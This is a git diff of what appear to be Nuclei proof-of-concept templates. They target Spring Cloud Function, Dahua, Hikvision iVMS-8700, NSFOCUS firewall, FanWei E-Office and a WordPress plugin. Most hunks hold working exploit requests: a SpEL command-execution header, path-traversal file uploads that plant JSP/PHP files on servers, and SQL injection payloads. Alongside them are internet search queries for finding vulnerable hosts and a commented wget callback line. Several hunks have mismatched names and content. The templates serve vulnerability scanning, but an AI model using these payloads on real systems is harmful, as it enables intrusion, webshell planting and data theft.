+ cve-id: CVE-2022-22963 + cwe-id: CWE-94 + tags: cve,cve2022,springcloud,rce requests: - - method: POST - path: - - "{{RootURL}}/functionRouter" - - "{{RootURL}}/api/functionRouter" - - "{{RootURL}}/api/v1/functionRouter" - - "{{RootURL}}/../../../../../../functionRouter" - - "{{RootURL}}/../../../../../../;functionRouter" - - "{{RootURL}}/spring/functionRouter" - - "{{RootURL}}/admin/functionRouter" - - "{{RootURL}}/../../../../../../../../functionRouter" - - "{{RootURL}}../../../../../../../../api/functionRouter" - - "{{RootURL}}../../../../../../../../api/v1/functionRouter" - - "{{RootURL}}%2f%2e%2e%2f%2e%2e%2ffunctionRouter" - - "{{RootURL}}%2fspring%2ffunctionRouter" - - "{{RootURL}}%2fadmin%2functionRouter" - headers: - spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("") - Content-Type: application/x-www-form-urlencoded - body: exp + - raw: + - | + POST /functionRouter HTTP/1.1 + Host: {{Hostname}} + spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{interactsh-url}}") + Content-Type: application/x-www-form-urlencoded + + {{rand_base(8)}} matchers-condition: and matchers: - - type: word - part: body - words: - - 'functionRouter' - - type: status - status: - - 500 \ No newline at end of file + - type: word + part: interactsh_protocol + words: + - "http" + - "dns" + condition: or + + - type: status + status: + - 500 + +# Enhanced by mp on 2022/05/19 diff --git a/poc/upload/Dahua_Video_FileUpload.yaml b/poc/upload/Dahua_Video_FileUpload.yaml index 78d89c1465..1af31ba824 100644 --- a/poc/upload/Dahua_Video_FileUpload.yaml +++ b/poc/upload/Dahua_Video_FileUpload.yaml @@ -1,29 +1,43 @@ id: Dahua info: - name: Dahua Smart Park Comprehensive Management Platform getFaceCapture SQL Injection Vulnerability + name: Dahua Smart Park Comprehensive Management Platform Video Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - There is an SQL injection vulnerability in the getFaceCapture interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to execute arbitrary SQL statements and obtain sensitive database information through the vulnerability + There is an arbitrary file upload vulnerability in the video interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to upload arbitrary files to the server and control server permissions metadata: fofa-query: app="dahua-智慧园区综合管理平台" hunter-query: web.body="/WPMS/asset/lib/json2.js" +http: + - raw: + - | + POST /publishing/publishing/material/file/video HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + Content-Length: 804 + Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7 + Accept-Encoding: gzip, deflate + Connection: close + --dd8f988919484abab3816881c55272a7 + Content-Disposition: form-data; name="Filedata"; filename="Test.jsp" -http: - - method: GET - path: - - "{{BaseURL}}/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D" + Test + --dd8f988919484abab3816881c55272a7 + Content-Disposition: form-data; name="Submit" - matchers-condition: and + submit + --dd8f988919484abab3816881c55272a7-- + + req-condition: true matchers: - - type: word - part: body - words: - - "c4ca" + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(body_1, "success")' + - 'contains(body_1, "path")' + condition: and - - type: status - status: - - 500 +# /publishingImg/VIDEO/230812152005170200.jsp diff --git a/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml b/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml index cd961f6e81..538f6fd6d5 100644 --- a/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml +++ b/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml @@ -1,27 +1,35 @@ id: HiKVISION info: - name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability - author: zerZero Trust Security Attack and Defense Laboratoryo - severity: medium + name: HiKVISION Comprehensive Security Management Platform Files Arbitrary File Upload Vulnerability + author: Zero Trust Security Attack and Defense Laboratory + severity: high description: | - There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks + HiKVISION comprehensive security management platform files interface has an arbitrary file upload vulnerability, allowing attackers to upload arbitrary files through the vulnerability metadata: - fofa-query: app="HIKVISION-综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + http: - - method: GET - path: - - "{{BaseURL}}/artemis-portal/artemis/env" + - raw: + - | + POST /center/api/files;.html HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a - matchers-condition: and - matchers: - - type: word - part: body - words: - - "profiles" + ------WebKitFormBoundary9PggsiM755PLa54a + Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" + Content-Type: application/zip + + <%out.print("test");%> - - type: status - status: - - 200 + ------WebKitFormBoundary9PggsiM755PLa54a-- + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(body_1, "test.jsp")' + condition: and diff --git a/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml b/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml index e86e8491d1..cd961f6e81 100644 --- a/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml +++ b/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml @@ -1,40 +1,27 @@ id: HiKVISION info: - name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability - author: Zero Trust Security Attack and Defense Laboratory - severity: high + name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability + author: zerZero Trust Security Attack and Defense Laboratoryo + severity: medium description: | - There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets + There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks metadata: - fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" http: - - raw: - - | - POST /svm/api/external/report HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a + - method: GET + path: + - "{{BaseURL}}/artemis-portal/artemis/env" - ------WebKitFormBoundary9PggsiM755PLa54a - Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" - Content-Type: application/zip - - <%out.print("test");%> - - ------WebKitFormBoundary9PggsiM755PLa54a-- - - | - GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 - - req-condition: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'status_code_1 == 200' - - 'contains(body_1, "data")' - - 'status_code_2 == 200' - - 'contains(body_2, "test")' - condition: and + - type: word + part: body + words: + - "profiles" + + - type: status + status: + - 200 diff --git a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml index 7f081b05e0..7e328a8b1b 100644 --- a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml +++ b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml @@ -1,48 +1,50 @@ id: HIKVISION info: - name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file - author: Zero Trust Security Attack and Defense Laboratory + name: HHIKVISION iVMS-8700 upload Webshell file + author: zerZero Trust Security Attack and Defense Laboratory severity: high description: | - HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files + HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file metadata: fofa-query: icon_hash="-911494769" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" variables: - str1: '{{rand_base(6)}}' - str2: '{{rand_base(6)}}' - str3: '<%out.print("{{str2}}");%>' + str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' http: - raw: - | - POST /eps/resourceOperations/upload.action HTTP/1.1 + POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 Host: {{Hostname}} - User-Agent: MicroMessenger - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj - - ------WebKitFormBoundaryTJyhtTNqdMNLZLhj - Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp" + User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Content-Length: 184 + Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 + + --c4155aff43901a8b2a19a4641a5efa15 + Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" Content-Type: image/jpeg - {{str3}} - ------WebKitFormBoundaryTJyhtTNqdMNLZLhj-- + {{randstr}} + --c4155aff43901a8b2a19a4641a5efa15-- - | - GET /eps/upload/{{res_id}}.jsp HTTP/1.1 + GET /eps/upload/{{name}}.jsp HTTP/1.1 Host: {{Hostname}} extractors: - type: json - name: res_id + name: name json: - ".data.resourceUuid" internal: true matchers: - - type: dsl - dsl: - - body_2 == str2 + - type: word + words: + - '{{randstr}}' diff --git a/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml b/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml index b35ef84818..a8f9cbe173 100644 --- a/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml +++ b/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml @@ -1,49 +1,59 @@ id: Green-Alliance info: - name: Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability + name: Green Alliance NF Next Generation Firewall Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability + Green Alliance SSL VPN has an arbitrary file upload vulnerability, allowing attackers to obtain server privileges and execute remote commands by sending special request packets metadata: - fofa-query: body="'/needUsbkey.php?username='" - hunter-query: web.body="'/needUsbkey.php?username='" + fofa-query: app="NSFOCUS-下一代防火墙" + hunter-query: web.title="用户认证 - NSFOCUS NF" + http: - - method: GET - path: - - "{{BaseURL}}/webconf/Exec/index?cmd=id" + - raw: + - | + POST /api/v1/device/bugsInfo HTTP/1.1 + Host: {{Host}}:8081 + Content-Type: multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + Content-Length: 238 + Accept-Encoding: gzip, deflate + Connection: close + + --1d52ba2a11ad8a915eddab1a0e85acd9 + Content-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac72" + + lang|s:52:"../../../../../../../../../../../../../../../../tmp/"; + --1d52ba2a11ad8a915eddab1a0e85acd9-- + + - | + POST /api/v1/device/bugsInfo HTTP/1.1 + Host: {{Host}}:8081 + Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + Content-Length: 217 + Accept-Encoding: gzip, deflate + Connection: close + + --4803b59d015026999b45993b1245f0ef + Content-Disposition: form-data; name="file"; filename="compose.php" + + + --4803b59d015026999b45993b1245f0ef-- + + - | + GET /mail/include/header_main.php HTTP/1.1 + Host: {{Host}}:4433 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac72 - matchers-condition: and matchers: - - type: word - part: body - words: - - "200" - - - type: status - status: - - 200 - - -# http: -# - method: GET -# path: -# - "{{BaseURL}}/webconf/Exec/index?cmd=wget%20{{interactsh-url}}" - -# attack: clusterbomb -# matchers-condition: or -# matchers: -# - type: word -# part: interactsh_protocol -# name: http -# words: -# - "http" - -# - type: word -# part: interactsh_protocol -# name: dns -# words: -# - "dns" + - type: dsl + dsl: + - "status_code_1 == 200 && contains(body_1, 'upload file success')" + - "status_code_2 == 200 && contains(body_2, 'upload file success')" + - "status_code_3 == 200 && contains(body_3, '{{randstr}}')" + condition: and diff --git a/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml b/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml index aa02a4941d..8c93d2bd55 100644 --- a/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml +++ b/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml @@ -1,52 +1,39 @@ id: FanWei info: - name: FanWei Micro OA E-Office upload.php Arbitrary File Upload Vulnerability + name: FanWei Micro OA E-Office Uploadify Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - FanWei E-Office uploads files in upload.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability + The pan micro OA E-Office uploads files in uploadify.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability metadata: fofa-query: app="泛微-EOffice" hunter-query: web.title="泛微软件" - -variables: - str1: '{{rand_base(6)}}' - str2: '{{rand_base(6)}}' - http: - raw: - | - POST /webservice/upload.php HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryakbyiukl - Accept-Encoding: gzip - Connection: close + POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 + Connection: close + Content-Length: 259 + Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 + Accept-Encoding: gzip - ------WebKitFormBoundaryakbyiukl - Content-Disposition: form-data; name="file"; filename="a.php4" - Content-Type: application/octet-stream + --e64bdf16c554bbc109cecef6451c26a4 + Content-Disposition: form-data; name="Filedata"; filename="test.php" + Content-Type: image/jpeg - - ------WebKitFormBoundaryakbyiukl-- + - - | - GET /attachment/{{replace(name,"*","/")}}.php4 HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: regex - name: name - group: 1 - regex: - - '([/*0-9a-zA-Z]+)\.php4$' - internal: true + --e64bdf16c554bbc109cecef6451c26a4-- + req-condition: true matchers: - type: dsl dsl: - - body_2 == str2 - -# http://your-ip/attachment/回显的那串数字/a.php4 + - 'status_code_1 == 200 && len(body) > 0' + condition: and + +# /attachment/3466744850/xxx.php diff --git a/poc/upload/ecology_E-Office_upload.yaml b/poc/upload/ecology_E-Office_upload.yaml index aa02a4941d..4e7ede529c 100644 --- a/poc/upload/ecology_E-Office_upload.yaml +++ b/poc/upload/ecology_E-Office_upload.yaml @@ -1,52 +1,29 @@ id: FanWei + info: - name: FanWei Micro OA E-Office upload.php Arbitrary File Upload Vulnerability + name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - FanWei E-Office uploads files in upload.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability + FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- metadata: - fofa-query: app="泛微-EOffice" - hunter-query: web.title="泛微软件" - + fofa-query: app="泛微-协同办公OA" + hunter-query: web.title="泛微-协同办公OA" -variables: - str1: '{{rand_base(6)}}' - str2: '{{rand_base(6)}}' http: - raw: - | - POST /webservice/upload.php HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryakbyiukl - Accept-Encoding: gzip - Connection: close - - ------WebKitFormBoundaryakbyiukl - Content-Disposition: form-data; name="file"; filename="a.php4" - Content-Type: application/octet-stream - - - ------WebKitFormBoundaryakbyiukl-- - - - | - GET /attachment/{{replace(name,"*","/")}}.php4 HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: regex - name: name - group: 1 - regex: - - '([/*0-9a-zA-Z]+)\.php4$' - internal: true + GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) + Accept-Encoding: gzip, deflate + Connection: close + req-condition: true matchers: - type: dsl dsl: - - body_2 == str2 - -# http://your-ip/attachment/回显的那串数字/a.php4 + - 'contains(body_1, "c4ca")' + condition: and diff --git a/poc/wordpress/wp-events-manager.yaml b/poc/wordpress/wp-events-manager.yaml new file mode 100644 index 0000000000..6f6bb9a48b --- /dev/null +++ b/poc/wordpress/wp-events-manager.yaml @@ -0,0 +1,59 @@ +id: wp-events-manager + +info: + name: > + WP Events Manager <= 2.1.11 - Authenticated (Subscriber+) Time-Based SQL Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/88dc08ff-3966-4606-855c-57c25552599e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-events-manager/" + google-query: inurl:"/wp-content/plugins/wp-events-manager/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-events-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-events-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-events-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.11') \ No newline at end of file